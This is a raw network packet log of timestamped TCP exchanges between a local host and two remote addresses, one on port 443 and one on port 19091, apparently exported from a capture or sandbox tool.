Dec 29, 2024 11:18:24.029200077 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.029221058 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.029262066 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.036587000 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.036612988 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.036711931 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.036740065 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.036801100 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.044737101 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.044754028 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.044826031 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.044843912 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.044883966 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.044904947 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.051933050 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.051949978 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.052017927 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.052026987 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.052063942 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.052175999 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.060087919 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.060103893 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.060149908 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.060158968 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.060193062 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.067742109 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.067763090 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.067836046 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.067867994 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.067910910 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.075833082 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.075848103 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.075887918 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.075897932 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.075911045 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.075939894 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.084043980 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.084062099 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.084126949 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.084135056 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.084177017 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.230329037 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.230355024 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.230417013 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.230453014 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.230470896 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.231836081 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.238089085 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.238116026 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.238193989 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.238204002 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.238240957 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.246198893 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.246220112 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.246288061 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.246299982 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.246340990 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.253345966 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.253366947 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.253447056 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.253460884 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.253500938 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.261420965 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.261439085 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.261509895 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.261521101 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.261559010 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.269171953 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.269196033 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.269488096 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.269498110 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.269539118 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.277273893 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.277296066 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.277367115 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.277379990 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.277421951 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.285578966 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.285607100 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.285643101 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.285656929 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.285686016 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.285703897 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.431725025 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.431756020 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.431808949 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.431864977 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.431889057 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.431902885 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.439198971 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.439228058 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.439270020 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.439280033 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.439308882 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.439326048 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.447261095 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.447280884 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.447340965 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.447355986 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.447381973 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.447395086 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.455485106 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.455506086 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.455553055 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.455571890 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.455590963 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.455615044 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.462615967 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.462636948 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.462739944 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.462757111 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.462795973 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.470196962 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.470228910 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.470263958 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.470282078 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.470310926 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.470324993 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.478370905 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.478393078 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.478446007 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.478457928 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.478482008 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.478497028 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.486452103 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.486475945 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.486531973 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.486546040 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.486560106 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.486573935 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.633483887 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.633510113 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.633568048 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.633585930 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.633596897 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.633626938 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.640583992 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.640600920 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.640666008 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.640675068 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.640716076 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.648727894 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.648751020 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.648799896 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.648808956 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.648833036 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.648840904 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.656852007 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.656893969 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.656949997 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.656960011 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.657001972 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.664155960 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.664174080 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.664251089 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.664275885 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.664328098 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.664329052 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.672657967 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.672676086 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.672714949 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.672725916 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.672756910 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.672780991 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.679805040 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.679822922 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.679874897 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.679886103 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.679915905 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.679934025 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.687905073 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.687927008 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.687994003 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.688005924 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.688045025 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.834947109 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.834970951 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.835020065 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.835040092 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.835063934 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.835078001 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.842221975 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.842247963 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.842303991 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.842325926 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.842348099 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.842370987 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.850627899 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.850651979 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.850694895 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.850712061 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.850729942 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.850753069 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.858294964 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.858314037 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.858354092 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.858361006 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.858395100 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.858409882 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.865396023 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.865415096 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.865458965 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.865467072 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.865495920 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.865511894 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.874119997 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.874140024 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.874178886 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.874185085 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.874205112 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.874227047 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.876606941 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.876687050 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.876688004 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.876735926 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.877583027 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.877600908 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:24.877613068 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:24.877643108 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:25.675451994 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:25.794712067 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:25.794785023 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:25.795526981 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:25.914758921 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:27.401302099 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:27.406755924 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:27.526155949 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:27.526177883 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:27.526221991 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.227731943 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.227766037 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.227778912 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.227803946 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.227860928 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.227910042 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.227922916 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.227929115 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.227936029 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.227950096 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.227963924 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.228020906 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.228151083 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.228164911 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.228219986 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.236479044 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.347332954 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.347480059 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.446985960 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.447016001 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.447083950 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.451180935 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.451200962 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.451545954 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.459635973 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.459650040 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.459706068 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.467875004 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.468050003 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.468187094 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.476243973 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.476393938 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.476504087 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.484590054 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.484613895 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.484791040 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.492913961 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.493071079 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.493189096 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.501190901 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.501437902 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.501481056 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.509565115 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.509716034 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.509776115 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.517931938 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.518069983 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.518140078 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.526263952 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.526434898 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.526537895 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.534488916 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.661151886 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.661242008 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.661313057 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.663932085 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.663990974 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.664010048 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.669595003 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.669672012 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.669703007 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.675287008 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.675342083 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.675385952 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.681102037 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.681149006 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.681179047 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.686747074 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.686794043 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.686799049 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.692409992 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.692468882 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.692492962 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.698111057 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.698214054 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.698242903 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.703836918 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.703886032 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.703916073 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.709486961 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.709556103 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.709556103 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.715152025 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.715195894 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.715270042 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.720869064 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.720927000 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.720952034 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.726670027 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.726712942 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.726778030 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.732275963 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.732383013 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.732410908 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.737930059 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.737993002 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.738106012 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.743639946 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.743680000 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.743688107 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.749397993 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.749452114 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.749460936 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.754987955 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.755044937 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.755098104 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.760699987 CET	19091	49723	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:28.760754108 CET	49723	19091	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:28.877772093 CET	19091	49723	118.107.44.219	192.168.2.7
